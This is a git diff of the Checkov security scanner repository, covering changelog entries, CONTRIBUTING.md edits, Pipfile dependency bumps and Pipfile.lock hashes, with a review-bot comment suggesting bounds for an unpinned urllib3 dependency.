Feature + +- **github:** add summary message in github_failed_only output - [#6131](https://github.com/bridgecrewio/checkov/pull/6131) +- **sast:** add ts checks to python pack - [#6261](https://github.com/bridgecrewio/checkov/pull/6261) +- **sast:** run all cdk integration test - [#6256](https://github.com/bridgecrewio/checkov/pull/6256) + +### Bug Fix + +- **general:** fix changed serif path - [#6251](https://github.com/bridgecrewio/checkov/pull/6251) + +## [3.2.79](https://github.com/bridgecrewio/checkov/compare/3.2.74...3.2.79) - 2024-05-02 + +### Feature + +- **sast:** Add 10 TS CDK - [#6194](https://github.com/bridgecrewio/checkov/pull/6194) +- **sast:** add typescript - DONT MERGE - [#6193](https://github.com/bridgecrewio/checkov/pull/6193) +- **sast:** Filter js files generate by ts - [#6220](https://github.com/bridgecrewio/checkov/pull/6220) +- **secrets:** bump bc-detect-secrets 1.5.9 - [#6205](https://github.com/bridgecrewio/checkov/pull/6205) +- **terraform:** Add GCP policy - [#6177](https://github.com/bridgecrewio/checkov/pull/6177) +- **terraform:** Add resource attributes to jsonify - [#6203](https://github.com/bridgecrewio/checkov/pull/6203) +- **terraform:** Ensure dedicated data endpoints are enabled - [#6188](https://github.com/bridgecrewio/checkov/pull/6188) +- **terraform:** support provider in tf_plan graph - [#6195](https://github.com/bridgecrewio/checkov/pull/6195) +- **terraform:** Update CloudArmorWAFACLCVE202144228.py - [#6217](https://github.com/bridgecrewio/checkov/pull/6217) + +### Bug Fix + +- **general:** add print to random test - [#6229](https://github.com/bridgecrewio/checkov/pull/6229) +- **general:** fix integration test in build - [#6227](https://github.com/bridgecrewio/checkov/pull/6227) +- **general:** fix integration tests - [#6207](https://github.com/bridgecrewio/checkov/pull/6207) +- **kubernetes:** Update checkov-job.yaml - [#5985](https://github.com/bridgecrewio/checkov/pull/5985) +- **sca:** remove old test for the 
depracated workflow github-action - [#6232](https://github.com/bridgecrewio/checkov/pull/6232) +- **terraform_plan:** Edges not created because of indexing in resource["address"] when resources in modules use count - [#6145](https://github.com/bridgecrewio/checkov/pull/6145) +- **terraform:** CKV_AWS_23 rule description fixed for clarity - [#5993](https://github.com/bridgecrewio/checkov/pull/5993) +- **terraform:** Fix CKV_AWS_358 to handle plan files - [#6202](https://github.com/bridgecrewio/checkov/pull/6202) + +### Platform + +- **ansible:** add create_definitions function for ansible framework - [#6225](https://github.com/bridgecrewio/checkov/pull/6225) + +### Documentation + +- **general:** Fix docs html brackets - [#6051](https://github.com/bridgecrewio/checkov/pull/6051) +- **general:** Remove Python 3.7 - [#6200](https://github.com/bridgecrewio/checkov/pull/6200) + +## [3.2.74](https://github.com/bridgecrewio/checkov/compare/3.2.73...3.2.74) - 2024-04-22 + +### Feature + +- **general:** Update range includes to handle lists of ranges and lists of values - [#6192](https://github.com/bridgecrewio/checkov/pull/6192) + +## [3.2.73](https://github.com/bridgecrewio/checkov/compare/3.2.72...3.2.73) - 2024-04-21 + +### Feature + +- **sast:** TypeScript cdk policies p7 - [#6186](https://github.com/bridgecrewio/checkov/pull/6186) + +## [3.2.72](https://github.com/bridgecrewio/checkov/compare/3.2.71...3.2.72) - 2024-04-19 + +### Feature + +- **bicep:** Add bicep version of policy - [#6191](https://github.com/bridgecrewio/checkov/pull/6191) + +## [3.2.71](https://github.com/bridgecrewio/checkov/compare/3.2.70...3.2.71) - 2024-04-18 + +### Feature + +- **sca:** support licenses custom policies enforcement rules - [#6173](https://github.com/bridgecrewio/checkov/pull/6173) + +## [3.2.70](https://github.com/bridgecrewio/checkov/compare/3.2.68...3.2.70) - 2024-04-17 + +### Feature + +- **sast:** Add 5 cdk for TS - [#6179](https://github.com/bridgecrewio/checkov/pull/6179) + 
+### Bug Fix + +- **sast:** fix skipped_checks paths before upload to the platform - [#6183](https://github.com/bridgecrewio/checkov/pull/6183) + +## [3.2.68](https://github.com/bridgecrewio/checkov/compare/3.2.65...3.2.68) - 2024-04-16 + +### Feature + +- **sast:** adding extended code block - [#6178](https://github.com/bridgecrewio/checkov/pull/6178) +- **sca:** using the new api license/get-licenses-violations instead of packages/get-licenses-violations (which is deprecated) - [#6174](https://github.com/bridgecrewio/checkov/pull/6174) + +### Bug Fix + +- **sca:** Revert "feat(sca): using the new api license/get-licenses-violations … - [#6176](https://github.com/bridgecrewio/checkov/pull/6176) + +## [3.2.65](https://github.com/bridgecrewio/checkov/compare/3.2.63...3.2.65) - 2024-04-15 + +### Bug Fix + +- **sast:** save suppress_comment for sast inline suppressions - [#6171](https://github.com/bridgecrewio/checkov/pull/6171) +- **secrets:** Azure Storage Key detector updates in bc-detect-secrets 1.5.7 - [#6168](https://github.com/bridgecrewio/checkov/pull/6168) + +## [3.2.63](https://github.com/bridgecrewio/checkov/compare/3.2.60...3.2.63) - 2024-04-14 + +### Feature + +- **sast:** CDK TS policies p2 - [#6165](https://github.com/bridgecrewio/checkov/pull/6165) + +## [3.2.60](https://github.com/bridgecrewio/checkov/compare/3.2.55...3.2.60) - 2024-04-10 + +### Feature + +- **sast:** Add TS CDK policies 1 - [#6151](https://github.com/bridgecrewio/checkov/pull/6151) +- **sast:** CDK TS policies p3 - [#6157](https://github.com/bridgecrewio/checkov/pull/6157) + +### Bug Fix + +- **terraform:** Fix conditional expression evaluation logic with compare - [#6160](https://github.com/bridgecrewio/checkov/pull/6160) +- **terraform:** Fixed flaky test for CKV_AWS_356 - [#6162](https://github.com/bridgecrewio/checkov/pull/6162) + +## [3.2.55](https://github.com/bridgecrewio/checkov/compare/3.2.53...3.2.55) - 2024-04-08 + +### Feature + +- **sast:** Adding typescript cdk part 6 
paz - [#6149](https://github.com/bridgecrewio/checkov/pull/6149) + +### Bug Fix + +- **sca:** enabling suppression in the cli-output for IR-files and dockerfiles - [#6148](https://github.com/bridgecrewio/checkov/pull/6148) + +## [3.2.53](https://github.com/bridgecrewio/checkov/compare/3.2.52...3.2.53) - 2024-04-03 + +### Feature + +- **terraform:** support s3 bucket name for references in graph - [#6134](https://github.com/bridgecrewio/checkov/pull/6134) + +## [3.2.52](https://github.com/bridgecrewio/checkov/compare/3.2.51...3.2.52) - 2024-04-03 + +### Feature + +- **general:** Update the releases' zip file names to be generic - [#6141](https://github.com/bridgecrewio/checkov/pull/6141) + +## [3.2.51](https://github.com/bridgecrewio/checkov/compare/3.2.50...3.2.51) - 2024-04-02 + +### Feature + +- **general:** add policy metadata filter exception flag - [#6132](https://github.com/bridgecrewio/checkov/pull/6132) + +## [3.2.50](https://github.com/bridgecrewio/checkov/compare/3.2.49...3.2.50) - 2024-03-31 + +### Bug Fix + +- **general:** remove limitation of resource and provider in tf.json file - [#6133](https://github.com/bridgecrewio/checkov/pull/6133) + +## [3.2.49](https://github.com/bridgecrewio/checkov/compare/3.2.47...3.2.49) - 2024-03-28 + +### Bug Fix + +- **general:** pin the version of schema to <=0.7.5 - [#6125](https://github.com/bridgecrewio/checkov/pull/6125) + +## [3.2.47](https://github.com/bridgecrewio/checkov/compare/3.2.45...3.2.47) - 2024-03-26 + +### Feature + +- **secrets:** bump manually bc-detect-secrets - [#6120](https://github.com/bridgecrewio/checkov/pull/6120) +- **terraform:** add fix for when tf_def is a string - [#6121](https://github.com/bridgecrewio/checkov/pull/6121) + +## [3.2.45](https://github.com/bridgecrewio/checkov/compare/3.2.44...3.2.45) - 2024-03-25 + +### Feature + +- **terraform:** fix for_each resource handling - [#6119](https://github.com/bridgecrewio/checkov/pull/6119) + +## 
[3.2.44](https://github.com/bridgecrewio/checkov/compare/3.2.43...3.2.44) - 2024-03-24 + +### Bug Fix + +- **sca:** Fix suppression integration crashing if licenseTypes is missing - [#6117](https://github.com/bridgecrewio/checkov/pull/6117) + +## [3.2.43](https://github.com/bridgecrewio/checkov/compare/3.2.42...3.2.43) - 2024-03-21 + +### Bug Fix + +- **terraform:** Fixed bug in evaluate_conditional_expression and added zipmap support - [#6106](https://github.com/bridgecrewio/checkov/pull/6106) + +## [3.2.42](https://github.com/bridgecrewio/checkov/compare/3.2.39...3.2.42) - 2024-03-20 + +### Feature + +- **sast:** support sast skipped checks - [#6095](https://github.com/bridgecrewio/checkov/pull/6095) + +### Bug Fix + +- **secrets:** ignore secret check in test file - [#6105](https://github.com/bridgecrewio/checkov/pull/6105) + +### Platform + +- **general:** handle API errors with more detail - [#6107](https://github.com/bridgecrewio/checkov/pull/6107) + +## [3.2.39](https://github.com/bridgecrewio/checkov/compare/3.2.38...3.2.39) - 2024-03-17 + +### Feature + +- **secrets:** fix entropy detector FP - [#6090](https://github.com/bridgecrewio/checkov/pull/6090) + +## [3.2.38](https://github.com/bridgecrewio/checkov/compare/3.2.37...3.2.38) - 2024-03-14 + +### Bug Fix + +- **terraform:** prevent side effects when updating variable rendering - [#6087](https://github.com/bridgecrewio/checkov/pull/6087) + +## [3.2.37](https://github.com/bridgecrewio/checkov/compare/3.2.36...3.2.37) - 2024-03-13 + +### Feature + +- **terraform:** connect module resource to provider - [#6083](https://github.com/bridgecrewio/checkov/pull/6083) + +## [3.2.36](https://github.com/bridgecrewio/checkov/compare/3.2.35...3.2.36) - 2024-03-12 + +### Bug Fix + +- **gha:** make sure to have prisma url - [#6084](https://github.com/bridgecrewio/checkov/pull/6084) + +## [3.2.35](https://github.com/bridgecrewio/checkov/compare/3.2.34...3.2.35) - 2024-03-11 + +### Feature + +- **general:** add policy 
name and guidelines to CSV output - [#6082](https://github.com/bridgecrewio/checkov/pull/6082) + +### Bug Fix + +- **sast:** add attribute verification - [#6078](https://github.com/bridgecrewio/checkov/pull/6078) + +## [3.2.34](https://github.com/bridgecrewio/checkov/compare/3.2.33...3.2.34) - 2024-03-10 + +### Bug Fix + +- **terraform:** Dont duplicate more vertices than needed for nested modules with large count/for each values + used cache to avoid extensive usage of os.path.realpath to drastically improve performance - [#6072](https://github.com/bridgecrewio/checkov/pull/6072) + +## [3.2.33](https://github.com/bridgecrewio/checkov/compare/3.2.32...3.2.33) - 2024-03-08 + +### Platform + +- **general:** improve upload failure logging and log size of failed files - [#6076](https://github.com/bridgecrewio/checkov/pull/6076) + +## [3.2.32](https://github.com/bridgecrewio/checkov/compare/3.2.31...3.2.32) - 2024-03-06 + +### Bug Fix + +- **sast:** do not log warning when using skip framework - [#6066](https://github.com/bridgecrewio/checkov/pull/6066) + +## [3.2.31](https://github.com/bridgecrewio/checkov/compare/3.2.28...3.2.31) - 2024-03-04 + +### Bug Fix + +- **terraform:** better handling of interpolation rendering in conditional expressions - [#6062](https://github.com/bridgecrewio/checkov/pull/6062) +- **terraform:** Changed a couple of checks from negative to positive check, behavior is the same - [#6063](https://github.com/bridgecrewio/checkov/pull/6063) + +## [3.2.28](https://github.com/bridgecrewio/checkov/compare/3.2.26...3.2.28) - 2024-02-28 + +### Bug Fix + +- **sca:** handling unknown severity - [#6055](https://github.com/bridgecrewio/checkov/pull/6055) +- **terraform:** Add Condition exceptions CKV_AWS_70 - [#6044](https://github.com/bridgecrewio/checkov/pull/6044) +- **terraform:** Add k8s 1.29 to CKV_AWS_339 - [#6056](https://github.com/bridgecrewio/checkov/pull/6056) + +## [3.2.26](https://github.com/bridgecrewio/checkov/compare/3.2.25...3.2.26) - 
2024-02-26 + +### Bug Fix + +- **sast:** fetch sast custom policieis - [#6040](https://github.com/bridgecrewio/checkov/pull/6040) + +## [3.2.25](https://github.com/bridgecrewio/checkov/compare/3.2.24...3.2.25) - 2024-02-25 + +### Feature + +- **terraform:** Added support for `try` function in evaluate_terraform - [#6043](https://github.com/bridgecrewio/checkov/pull/6043) + +## [3.2.24](https://github.com/bridgecrewio/checkov/compare/3.2.23...3.2.24) - 2024-02-22 + +### Feature + +- **cloudformation:** add CFN policies for MSK - [#6021](https://github.com/bridgecrewio/checkov/pull/6021) + +## [3.2.23](https://github.com/bridgecrewio/checkov/compare/3.2.22...3.2.23) - 2024-02-21 + +### Bug Fix + +- **terraform:** support vertex reference based on foreach key - [#6039](https://github.com/bridgecrewio/checkov/pull/6039) + +## [3.2.22](https://github.com/bridgecrewio/checkov/compare/3.2.21...3.2.22) - 2024-02-18 + +### Bug Fix + +- **terraform:** CKV_AWS_308 - checked if caching was enabled and only then check for encryption of cache - [#6034](https://github.com/bridgecrewio/checkov/pull/6034) + +## [3.2.21](https://github.com/bridgecrewio/checkov/compare/3.2.20...3.2.21) - 2024-02-14 + +### Bug Fix + +- **sast:** fix cdk checks path - [#6029](https://github.com/bridgecrewio/checkov/pull/6029) + +## [3.2.20](https://github.com/bridgecrewio/checkov/compare/3.2.19...3.2.20) - 2024-02-11 + +### Bug Fix + +- **graph:** remove SCA runner v1 - re-enable - [#6024](https://github.com/bridgecrewio/checkov/pull/6024) + +## [3.2.19](https://github.com/bridgecrewio/checkov/compare/3.2.17...3.2.19) - 2024-02-08 + +### Feature + +- **general:** Implement authentication retry mechanism - [#6022](https://github.com/bridgecrewio/checkov/pull/6022) +- **sast:** add danger rule - [#6012](https://github.com/bridgecrewio/checkov/pull/6012) + +## [3.2.17](https://github.com/bridgecrewio/checkov/compare/3.2.12...3.2.17) - 2024-02-07 + +### Bug Fix + +- **general:** downgrade botocore 
dependency - [#6016](https://github.com/bridgecrewio/checkov/pull/6016)
+- **graph:** remove SCA runner v1 - [#6005](https://github.com/bridgecrewio/checkov/pull/6005)
+- **terraform:** Deleted deprecated check CKV_GCP_19 - [#6010](https://github.com/bridgecrewio/checkov/pull/6010)
 ## [3.2.12](https://github.com/bridgecrewio/checkov/compare/3.2.8...3.2.12) - 2024-02-06
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 44c4f484979..54b5c571efd 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -8,9 +8,13 @@ If you've already developed new checks we'd be happy to take a look at them and
 ## Open an issue
-Checkov is an open source project maintained by [Prisma Cloud by Palo Alto Networks](https://www.prismacloud.io/?utm_source=github&utm_medium=organic_oss&utm_campaign=checkov). We have dedicated maintainers developing
-new content and adding more features. If you have a bug or an idea, start by opening an issue. Try to make it as
-descriptive as possible.
+Checkov is an open source project maintained by
+[Prisma Cloud by Palo Alto Networks](https://www.prismacloud.io/?utm_source=github&utm_medium=organic_oss&utm_campaign=checkov).
+Our team of maintainers continuously works on developing new features and enhancing existing features. If you encounter
+a bug or have a suggestion, please start by opening an Issue. When reporting, provide a detailed description with examples
+to help us understand the context and specifics. Please note that while we review every issue, non-critical or
+non-blocking issues may be prioritized based on their popularity or frequency. We appreciate your contributions and
+engagement in helping us improve Checkov.
 ## Developing and contributing code
@@ -58,10 +62,10 @@ Continuous integration will run these tests either as pre-submits on PRs and pos
 Results will appear under [actions](https://github.com/bridgecrewio/checkov/actions).
 To run tests locally use the following commands (install dev dependencies, run tests and compute tests coverage):
-If you are using conda, create a new environment with Python 3.7.10 version:
+If you are using conda, create a new environment with Python 3.10.14 version:
 ```sh
-conda create -n python37 --m python=3.7.10
-conda activate python37
+conda create -n python310 --m python=Python 3.10.14
+conda activate python310
 ```
 Then, we need pipenv installation and run the tests and coverage modules
 ```sh
diff --git a/Pipfile b/Pipfile
index 9b2d9bbb778..ee8866e976e 100644
--- a/Pipfile
+++ b/Pipfile
@@ -43,7 +43,7 @@ types-colorama = "<0.5.0,>=0.4.3"
 # REMINDER: Update "install_requires" deps on setup.py when changing
 #
 bc-python-hcl2 = "==0.4.2"
-bc-detect-secrets = "==1.5.4"
+bc-detect-secrets = "==1.5.15"
 bc-jsonpath-ng = "==1.6.1"
 pycep-parser = "==0.4.1"
 tabulate = ">=0.9.0,<0.10.0"
@@ -72,6 +72,7 @@ click = ">=8.1.0,<9.0.0"
 aiohttp = ">=3.8.0,<4.0.0"
 aiodns = ">=3.0.0,<4.0.0"
 aiomultiprocess = ">=0.9.0,<0.10.0"
+schema = "<=0.7.5"
 jsonschema = ">=4.17.0,<5.0.0"
 prettytable = ">=3.6.0,<4.0.0"
 charset-normalizer = ">=3.1.0,<4.0.0"
@@ -85,6 +86,7 @@ license-expression = ">=30.1.0,<31.0.0"
 rustworkx = ">=0.13.0,<0.14.0"
 pydantic = ">=2.0.0,<3.0.0"
 botocore = "==1.34.25"
+urllib3 = "*"
 [requires]
 python_version = "3.8"
diff --git a/Pipfile.lock b/Pipfile.lock
index 30b8aef12af..dbd3806608c 100644
--- a/Pipfile.lock
+++ b/Pipfile.lock
@@ -1,7 +1,7 @@
 {
 "_meta": {
 "hash": {
- "sha256": "847f53f013d5e094e228fca5fe357f366d259a71bf3ddb184b174bb0feac6295"
+ "sha256": "1f0fbf49f72ed415c772b5b5bbf619e50ea52c4e912895c32a2943b3a5312e60"
 },
 "pipfile-spec": 6,
 "requires": {
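Review bot: `urllib3 = "*"` in the `@@ -85,6 +86,7 @@` Pipfile hunk is the only dependency in this block with no version constraint at all; its neighbours carry a bounded range or an exact pin (`pydantic = ">=2.0.0,<3.0.0"`, `botocore = "==1.34.25"`), and the new `schema = "<=0.7.5"` entry in the preceding hunk likewise has no lower bound. An unbounded spec means the next lock refresh may pull any future major release of urllib3, so an incompatible change in the HTTP layer would land silently rather than being a deliberate bump; a range in the file's own style, e.g. `urllib3 = ">=1.26.0,<3.0.0"` (illustrative — set the bounds to what the code is actually tested against), keeps the upgrade path explicit. The `# REMINDER: Update "install_requires" deps on setup.py when changing` comment in the first Pipfile hunk applies to both additions as well; setup.py is not part of this chunk, so whether it was updated cannot be confirmed here.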
@@ -18,103 +18,103 @@ "default": { "aiodns": { "hashes": [ - "sha256:1073eac48185f7a4150cad7f96a5192d6911f12b4fb894de80a088508c9b3a99", - "sha256:a387b63da4ced6aad35b1dda2d09620ad608a1c7c0fb71efa07ebb4cd511928d" + "sha256:62869b23409349c21b072883ec8998316b234c9a9e36675756e8e317e8768f72", + "sha256:e443c0c27b07da3174a109fd9e736d69058d808f144d3c9d56dbd1776964c5f5" ], "index": "pypi", - "version": "==3.1.1" + "version": "==3.2.0" }, "aiohttp": { "hashes": [ - "sha256:017a21b0df49039c8f46ca0971b3a7fdc1f56741ab1240cb90ca408049766168", - "sha256:039df344b45ae0b34ac885ab5b53940b174530d4dd8a14ed8b0e2155b9dddccb", - "sha256:055ce4f74b82551678291473f66dc9fb9048a50d8324278751926ff0ae7715e5", - "sha256:06a9b2c8837d9a94fae16c6223acc14b4dfdff216ab9b7202e07a9a09541168f", - "sha256:07b837ef0d2f252f96009e9b8435ec1fef68ef8b1461933253d318748ec1acdc", - "sha256:0ed621426d961df79aa3b963ac7af0d40392956ffa9be022024cd16297b30c8c", - "sha256:0fa43c32d1643f518491d9d3a730f85f5bbaedcbd7fbcae27435bb8b7a061b29", - "sha256:1f5a71d25cd8106eab05f8704cd9167b6e5187bcdf8f090a66c6d88b634802b4", - "sha256:1f5cd333fcf7590a18334c90f8c9147c837a6ec8a178e88d90a9b96ea03194cc", - "sha256:27468897f628c627230dba07ec65dc8d0db566923c48f29e084ce382119802bc", - "sha256:298abd678033b8571995650ccee753d9458dfa0377be4dba91e4491da3f2be63", - "sha256:2c895a656dd7e061b2fd6bb77d971cc38f2afc277229ce7dd3552de8313a483e", - "sha256:361a1026c9dd4aba0109e4040e2aecf9884f5cfe1b1b1bd3d09419c205e2e53d", - "sha256:363afe77cfcbe3a36353d8ea133e904b108feea505aa4792dad6585a8192c55a", - "sha256:38a19bc3b686ad55804ae931012f78f7a534cce165d089a2059f658f6c91fa60", - "sha256:38f307b41e0bea3294a9a2a87833191e4bcf89bb0365e83a8be3a58b31fb7f38", - "sha256:3e59c23c52765951b69ec45ddbbc9403a8761ee6f57253250c6e1536cacc758b", - "sha256:4b4af9f25b49a7be47c0972139e59ec0e8285c371049df1a63b6ca81fdd216a2", - "sha256:504b6981675ace64c28bf4a05a508af5cde526e36492c98916127f5a02354d53", - "sha256:50fca156d718f8ced687a373f9e140c1bb765ca16e3d6f4fe116e3df7c05b2c5", 
- "sha256:522a11c934ea660ff8953eda090dcd2154d367dec1ae3c540aff9f8a5c109ab4", - "sha256:52df73f14ed99cee84865b95a3d9e044f226320a87af208f068ecc33e0c35b96", - "sha256:595f105710293e76b9dc09f52e0dd896bd064a79346234b521f6b968ffdd8e58", - "sha256:59c26c95975f26e662ca78fdf543d4eeaef70e533a672b4113dd888bd2423caa", - "sha256:5bce0dc147ca85caa5d33debc4f4d65e8e8b5c97c7f9f660f215fa74fc49a321", - "sha256:5eafe2c065df5401ba06821b9a054d9cb2848867f3c59801b5d07a0be3a380ae", - "sha256:5ed3e046ea7b14938112ccd53d91c1539af3e6679b222f9469981e3dac7ba1ce", - "sha256:5fe9ce6c09668063b8447f85d43b8d1c4e5d3d7e92c63173e6180b2ac5d46dd8", - "sha256:648056db9a9fa565d3fa851880f99f45e3f9a771dd3ff3bb0c048ea83fb28194", - "sha256:69361bfdca5468c0488d7017b9b1e5ce769d40b46a9f4a2eed26b78619e9396c", - "sha256:6b0e029353361f1746bac2e4cc19b32f972ec03f0f943b390c4ab3371840aabf", - "sha256:6b88f9386ff1ad91ace19d2a1c0225896e28815ee09fc6a8932fded8cda97c3d", - "sha256:770d015888c2a598b377bd2f663adfd947d78c0124cfe7b959e1ef39f5b13869", - "sha256:7943c414d3a8d9235f5f15c22ace69787c140c80b718dcd57caaade95f7cd93b", - "sha256:7cf5c9458e1e90e3c390c2639f1017a0379a99a94fdfad3a1fd966a2874bba52", - "sha256:7f46acd6a194287b7e41e87957bfe2ad1ad88318d447caf5b090012f2c5bb528", - "sha256:82e6aa28dd46374f72093eda8bcd142f7771ee1eb9d1e223ff0fa7177a96b4a5", - "sha256:835a55b7ca49468aaaac0b217092dfdff370e6c215c9224c52f30daaa735c1c1", - "sha256:84871a243359bb42c12728f04d181a389718710129b36b6aad0fc4655a7647d4", - "sha256:8aacb477dc26797ee089721536a292a664846489c49d3ef9725f992449eda5a8", - "sha256:8e2c45c208c62e955e8256949eb225bd8b66a4c9b6865729a786f2aa79b72e9d", - "sha256:90842933e5d1ff760fae6caca4b2b3edba53ba8f4b71e95dacf2818a2aca06f7", - "sha256:938a9653e1e0c592053f815f7028e41a3062e902095e5a7dc84617c87267ebd5", - "sha256:939677b61f9d72a4fa2a042a5eee2a99a24001a67c13da113b2e30396567db54", - "sha256:9d3c9b50f19704552f23b4eaea1fc082fdd82c63429a6506446cbd8737823da3", - 
"sha256:a6fe5571784af92b6bc2fda8d1925cccdf24642d49546d3144948a6a1ed58ca5", - "sha256:a78ed8a53a1221393d9637c01870248a6f4ea5b214a59a92a36f18151739452c", - "sha256:ab40e6251c3873d86ea9b30a1ac6d7478c09277b32e14745d0d3c6e76e3c7e29", - "sha256:abf151955990d23f84205286938796c55ff11bbfb4ccfada8c9c83ae6b3c89a3", - "sha256:acef0899fea7492145d2bbaaaec7b345c87753168589cc7faf0afec9afe9b747", - "sha256:b40670ec7e2156d8e57f70aec34a7216407848dfe6c693ef131ddf6e76feb672", - "sha256:b791a3143681a520c0a17e26ae7465f1b6f99461a28019d1a2f425236e6eedb5", - "sha256:b955ed993491f1a5da7f92e98d5dad3c1e14dc175f74517c4e610b1f2456fb11", - "sha256:ba39e9c8627edc56544c8628cc180d88605df3892beeb2b94c9bc857774848ca", - "sha256:bca77a198bb6e69795ef2f09a5f4c12758487f83f33d63acde5f0d4919815768", - "sha256:c3452ea726c76e92f3b9fae4b34a151981a9ec0a4847a627c43d71a15ac32aa6", - "sha256:c46956ed82961e31557b6857a5ca153c67e5476972e5f7190015018760938da2", - "sha256:c7c8b816c2b5af5c8a436df44ca08258fc1a13b449393a91484225fcb7545533", - "sha256:cd73265a9e5ea618014802ab01babf1940cecb90c9762d8b9e7d2cc1e1969ec6", - "sha256:dad46e6f620574b3b4801c68255492e0159d1712271cc99d8bdf35f2043ec266", - "sha256:dc9b311743a78043b26ffaeeb9715dc360335e5517832f5a8e339f8a43581e4d", - "sha256:df822ee7feaaeffb99c1a9e5e608800bd8eda6e5f18f5cfb0dc7eeb2eaa6bbec", - "sha256:e083c285857b78ee21a96ba1eb1b5339733c3563f72980728ca2b08b53826ca5", - "sha256:e5e46b578c0e9db71d04c4b506a2121c0cb371dd89af17a0586ff6769d4c58c1", - "sha256:e99abf0bba688259a496f966211c49a514e65afa9b3073a1fcee08856e04425b", - "sha256:ee43080e75fc92bf36219926c8e6de497f9b247301bbf88c5c7593d931426679", - "sha256:f033d80bc6283092613882dfe40419c6a6a1527e04fc69350e87a9df02bbc283", - "sha256:f1088fa100bf46e7b398ffd9904f4808a0612e1d966b4aa43baa535d1b6341eb", - "sha256:f56455b0c2c7cc3b0c584815264461d07b177f903a04481dfc33e08a89f0c26b", - "sha256:f59dfe57bb1ec82ac0698ebfcdb7bcd0e99c255bd637ff613760d5f33e7c81b3", - "sha256:f7217af2e14da0856e082e96ff637f14ae45c10a5714b63c77f26d8884cf1051", 
- "sha256:f734e38fd8666f53da904c52a23ce517f1b07722118d750405af7e4123933511", - "sha256:f95511dd5d0e05fd9728bac4096319f80615aaef4acbecb35a990afebe953b0e", - "sha256:fdd215b7b7fd4a53994f238d0f46b7ba4ac4c0adb12452beee724ddd0743ae5d", - "sha256:feeb18a801aacb098220e2c3eea59a512362eb408d4afd0c242044c33ad6d542", - "sha256:ff30218887e62209942f91ac1be902cc80cddb86bf00fbc6783b7a43b2bea26f" - ], - "index": "pypi", - "markers": "python_version >= '3.8'", - "version": "==3.9.3" + "sha256:0605cc2c0088fcaae79f01c913a38611ad09ba68ff482402d3410bf59039bfb8", + "sha256:0a158704edf0abcac8ac371fbb54044f3270bdbc93e254a82b6c82be1ef08f3c", + "sha256:0cbf56238f4bbf49dab8c2dc2e6b1b68502b1e88d335bea59b3f5b9f4c001475", + "sha256:1732102949ff6087589408d76cd6dea656b93c896b011ecafff418c9661dc4ed", + "sha256:18f634d540dd099c262e9f887c8bbacc959847cfe5da7a0e2e1cf3f14dbf2daf", + "sha256:239f975589a944eeb1bad26b8b140a59a3a320067fb3cd10b75c3092405a1372", + "sha256:2faa61a904b83142747fc6a6d7ad8fccff898c849123030f8e75d5d967fd4a81", + "sha256:320e8618eda64e19d11bdb3bd04ccc0a816c17eaecb7e4945d01deee2a22f95f", + "sha256:38d80498e2e169bc61418ff36170e0aad0cd268da8b38a17c4cf29d254a8b3f1", + "sha256:3916c8692dbd9d55c523374a3b8213e628424d19116ac4308e434dbf6d95bbdd", + "sha256:393c7aba2b55559ef7ab791c94b44f7482a07bf7640d17b341b79081f5e5cd1a", + "sha256:3b7b30258348082826d274504fbc7c849959f1989d86c29bc355107accec6cfb", + "sha256:3fcb4046d2904378e3aeea1df51f697b0467f2aac55d232c87ba162709478c46", + "sha256:4109adee842b90671f1b689901b948f347325045c15f46b39797ae1bf17019de", + "sha256:4558e5012ee03d2638c681e156461d37b7a113fe13970d438d95d10173d25f78", + "sha256:45731330e754f5811c314901cebdf19dd776a44b31927fa4b4dbecab9e457b0c", + "sha256:4715a9b778f4293b9f8ae7a0a7cef9829f02ff8d6277a39d7f40565c737d3771", + "sha256:471f0ef53ccedec9995287f02caf0c068732f026455f07db3f01a46e49d76bbb", + "sha256:4d3ebb9e1316ec74277d19c5f482f98cc65a73ccd5430540d6d11682cd857430", + 
"sha256:4ff550491f5492ab5ed3533e76b8567f4b37bd2995e780a1f46bca2024223233", + "sha256:52c27110f3862a1afbcb2af4281fc9fdc40327fa286c4625dfee247c3ba90156", + "sha256:55b39c8684a46e56ef8c8d24faf02de4a2b2ac60d26cee93bc595651ff545de9", + "sha256:5a7ee16aab26e76add4afc45e8f8206c95d1d75540f1039b84a03c3b3800dd59", + "sha256:5ca51eadbd67045396bc92a4345d1790b7301c14d1848feaac1d6a6c9289e888", + "sha256:5d6b3f1fabe465e819aed2c421a6743d8debbde79b6a8600739300630a01bf2c", + "sha256:60cdbd56f4cad9f69c35eaac0fbbdf1f77b0ff9456cebd4902f3dd1cf096464c", + "sha256:6380c039ec52866c06d69b5c7aad5478b24ed11696f0e72f6b807cfb261453da", + "sha256:639d0042b7670222f33b0028de6b4e2fad6451462ce7df2af8aee37dcac55424", + "sha256:66331d00fb28dc90aa606d9a54304af76b335ae204d1836f65797d6fe27f1ca2", + "sha256:67c3119f5ddc7261d47163ed86d760ddf0e625cd6246b4ed852e82159617b5fb", + "sha256:694d828b5c41255e54bc2dddb51a9f5150b4eefa9886e38b52605a05d96566e8", + "sha256:6ae79c1bc12c34082d92bf9422764f799aee4746fd7a392db46b7fd357d4a17a", + "sha256:702e2c7c187c1a498a4e2b03155d52658fdd6fda882d3d7fbb891a5cf108bb10", + "sha256:714d4e5231fed4ba2762ed489b4aec07b2b9953cf4ee31e9871caac895a839c0", + "sha256:7b179eea70833c8dee51ec42f3b4097bd6370892fa93f510f76762105568cf09", + "sha256:7f64cbd44443e80094309875d4f9c71d0401e966d191c3d469cde4642bc2e031", + "sha256:82a6a97d9771cb48ae16979c3a3a9a18b600a8505b1115cfe354dfb2054468b4", + "sha256:84dabd95154f43a2ea80deffec9cb44d2e301e38a0c9d331cc4aa0166fe28ae3", + "sha256:8676e8fd73141ded15ea586de0b7cda1542960a7b9ad89b2b06428e97125d4fa", + "sha256:88e311d98cc0bf45b62fc46c66753a83445f5ab20038bcc1b8a1cc05666f428a", + "sha256:8b4f72fbb66279624bfe83fd5eb6aea0022dad8eec62b71e7bf63ee1caadeafe", + "sha256:8c64a6dc3fe5db7b1b4d2b5cb84c4f677768bdc340611eca673afb7cf416ef5a", + "sha256:8cf142aa6c1a751fcb364158fd710b8a9be874b81889c2bd13aa8893197455e2", + "sha256:8d1964eb7617907c792ca00b341b5ec3e01ae8c280825deadbbd678447b127e1", + "sha256:93e22add827447d2e26d67c9ac0161756007f152fdc5210277d00a85f6c92323", 
